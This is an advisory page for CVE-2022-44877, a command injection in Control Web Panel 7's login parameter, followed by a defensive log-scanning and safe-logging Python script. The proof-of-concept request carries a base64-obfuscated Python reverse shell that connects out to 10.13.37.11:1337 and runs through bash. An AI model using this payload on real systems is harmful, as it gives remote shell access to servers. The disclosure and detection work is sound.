| Title | Published | Views | Family |
|---|---|---|---|
| Control Web Panel 7 Remote Code Execution Vulnerability | 10 Jan 2023 00:00 | – | zdt |
| Control Web Panel Unauthenticated Remote Command Execution Exploit | 31 Jan 2023 00:00 | – | zdt |
| Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution Vulnerability | 2 Apr 2023 00:00 | – | zdt |
| Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution Exploit | 5 Apr 2023 00:00 | – | zdt |
| CVE-2022-44877 | 5 Jan 2023 00:00 | – | attackerkb |
| Exploit for OS Command Injection in Control-Webpanel Webpanel | 15 Feb 2023 15:22 | – | githubexploit |
| CVE-2022-44877 | 5 Jan 2023 19:40 | – | circl |
| CWP Control Web Panel OS Command Injection Vulnerability | 17 Jan 2023 00:00 | – | cisa_kev |
| CentOS Web Panel OS command injection vulnerability | 5 Jan 2023 00:00 | – | cnnvd |
| CVE-2022-44877 | 5 Jan 2023 00:00 | – | cve |
[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Author: Numan Türle
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877
Description
--------------
Arbitrary Bash commands can be executed because the value of the `login` parameter is placed inside double quotes in the shell command that logs incorrect login entries; Bash still expands `$(...)` command substitution inside double quotes, so the substituted command runs on the server.
Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY
Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
username=root&password=toor&commit=Login
--------------
Solution
--------
Upgrade to CWP7 current version
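For teams that cannot patch immediately, the request pattern above is easy to spot in web-server access logs: the injected value arrives in the query string of `/login/index.php` and has to contain a Bash expansion construct (`$(`, backticks, or `${`) to do anything. The following Python is an added example written for this page, not code from the advisory author or the CWP project. It scans constructed access-log lines in combined format, URL-decodes the query string, and flags any parameter on the login endpoint that carries such a construct (a slight generalization of the page, which names only the `login` parameter), and it shows the remediation direction in code: record the failed login with ordinary file I/O instead of interpolating the value into a shell command, so the text stays literal. The log-line format, IP addresses, timestamps and the log-entry wording are all assumptions.

```python
"""Detection and safe-logging helper for the CWP login-parameter command injection
(CVE-2022-44877). Added example; sample log lines below are constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format). Not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2023:10:01:02 +0000] "GET /login/index.php?login=failed HTTP/1.1" 200 512
10.0.0.9 - - [05/Jan/2023:10:01:09 +0000] "POST /login/index.php?login=$(whoami) HTTP/1.1" 200 512
10.0.0.9 - - [05/Jan/2023:10:01:15 +0000] "POST /login/index.php?login=%24%28id%29 HTTP/1.1" 200 512
10.0.0.7 - - [05/Jan/2023:10:02:00 +0000] "GET /login/index.php?login=failed&foo=`id` HTTP/1.1" 200 512
10.0.0.8 - - [05/Jan/2023:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 99
"""

# Combined-format request line: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# Bash constructs that are expanded even inside double quotes:
# command substitution $( ... ) and `...`, and parameter expansion ${...} / $NAME.
SHELL_EXPANSION_RE = re.compile(r'\$\(|`|\$\{|\$[A-Za-z_]')

LOGIN_PATH = "/login/index.php"  # affected component named on the page


def suspicious_login_values(target):
    """Return (parameter, decoded value) pairs for every query parameter of the
    login endpoint whose URL-decoded value contains a Bash expansion construct.
    Requests to other paths return an empty list."""
    parts = urlsplit(target)
    if parts.path != LOGIN_PATH:
        return []
    hits = []
    # parse_qs performs the percent-decoding, so %24%28 becomes "$(".
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if SHELL_EXPANSION_RE.search(value):
                hits.append((name, value))
    return hits


def scan_log(text):
    """Scan access-log text and return one finding per request that carries a
    shell expansion construct in a login-endpoint query parameter."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a recognisable request line; skip rather than guess
        hits = suspicious_login_values(match.group("target"))
        if hits:
            findings.append({"ip": match.group("ip"), "ts": match.group("ts"),
                             "method": match.group("method"), "params": hits})
    return findings


def format_failed_login_entry(remote_ip, login_value):
    """Build the log line for a failed login as plain text. Nothing here is
    evaluated by a shell, so "$(whoami)" is recorded as those nine characters."""
    return f"incorrect entry, IP address ({remote_ip}), login value {login_value!r}\n"


def log_failed_login_safely(log_path, remote_ip, login_value):
    """Append the entry with ordinary file I/O instead of `echo "..." >> file`
    run through a shell, which is the pattern the advisory describes."""
    with open(log_path, "a", encoding="utf-8") as fh:
        fh.write(format_failed_login_entry(remote_ip, login_value))


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

`parse_qs` decodes percent-encoding once, which is what the web server does before the value reaches the application; double-encoded payloads would need a second decoding pass if your server stack applies one. The detector is deliberately broad (any parameter on the login endpoint), since the cost of reviewing a false positive on a login endpoint is low compared with missing a command substitution.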